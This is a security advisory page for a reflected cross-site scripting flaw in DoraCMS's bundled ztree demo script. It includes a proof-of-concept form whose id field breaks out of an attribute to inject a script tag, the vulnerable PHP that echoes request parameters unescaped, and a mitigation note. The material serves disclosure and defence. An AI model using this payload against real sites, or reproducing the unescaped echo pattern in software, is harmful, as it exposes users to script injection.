DoraCMS Cross Site Scripting
Posted on 30 November -0001
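<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>DoraCMS Cross Site Scripting</title>
</head>
<body>
  <h1>DoraCMS Cross Site Scripting</h1>

  <dl>
    <dt>Exploit Title</dt>
    <dd>DoraCMS Cross Site Scripting</dd>
    <dt>Exploit Author</dt>
    <dd>Ashiyane Digital Security Team</dd>
    <dt>Download Link</dt>
    <dd><a href="https://github.com/doramart/DoraCMS">https://github.com/doramart/DoraCMS</a></dd>
    <dt>Tested on</dt>
    <dd>Kali Linux</dd>
    <dt>Date</dt>
    <dd>12 /29 / 2016</dd>
  </dl>

  <h2>Exploit Code</h2>
  <!-- The listing is escaped text inside pre/code, not live markup: the advisory
       previously embedded this form directly in its own body, so the unclosed
       attribute and the script tag it contains would have executed on this page. -->
  <pre><code>&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;DoraCMS Cross Site Scripting&lt;/TITLE&gt;&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;form action="http://127.0.0.1/DoraCMS-master/public/plugins/ztree/demo/cn/asyncData/getNodes.php" method="post"&gt;
&lt;input type="hidden" name="n" value="n1" /&gt;
&lt;input type="hidden" name="lv" value="0" /&gt;
&lt;input type="hidden" name="id" value="1.3'"/&gt;&lt;ScRiPt &gt;alert('M.R.S.L.Y')&lt;/ScRiPt&gt;" /&gt;
&lt;input type="hidden" name="otherParam" value="M.R.S.L.Y" /&gt;
&lt;/form&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;</code></pre>

  <h2>Vulnerable code</h2>
  <p>File: <code>public/plugins/ztree/demo/cn/asyncData/getNodes.php</code> (path as used in the form action above).</p>
  <pre><code>&lt;?php ?&gt;
[&lt;?php
$pId = "0";
$pName = "";
$pLevel = "";
$pCheck = "";
if(array_key_exists( 'id',$_REQUEST)) { $pId=$_REQUEST['id']; }
if(array_key_exists( 'lv',$_REQUEST)) { $pLevel=$_REQUEST['lv']; }
if(array_key_exists('n',$_REQUEST)) { $pName=$_REQUEST['n']; }
if(array_key_exists('chk',$_REQUEST)) { $pCheck=$_REQUEST['chk']; }
if ($pId==null || $pId=="") $pId = "0";
if ($pLevel==null || $pLevel=="") $pLevel = "0";
if ($pName==null) $pName = ""; else $pName = $pName.".";
//for ($i=1; $i&lt;9999; $i++) {
// for ($j=1; $j&lt;999; $j++) {
//
// }
//}
for ($i=1; $i&lt;5; $i++) {
    $nId = $pId.$i;
    $nName = $pName."n".$i;
    echo "{ id:'".$nId."', name:'".$nName."', isParent:".(( $pLevel &lt; "2" &amp;&amp; ($i%2)!=0)?"true":"false").($pCheck==""?"":((($pLevel &lt; "2" &amp;&amp; ($i%2)!=0)?", halfCheck:true":"").($i==3?", checked:true":"")))."}";
    if ($i&lt;4) { echo ","; }
}
?&gt;]</code></pre>

  <p>
    Root cause: <code>$pId</code> (from <code>$_REQUEST['id']</code>) and <code>$pName</code>
    (from <code>$_REQUEST['n']</code>) are concatenated straight into the echoed response, so any
    markup supplied in those request parameters is reflected verbatim. Mitigation: build each node
    as an array and emit the list with <code>json_encode()</code> (or escape every reflected value
    with <code>htmlspecialchars()</code>), and do not ship the ztree <code>demo</code> directory in
    a production deployment.
  </p>

  <p>Discovered By: M.R.S.L.Y</p>
</body>
</html>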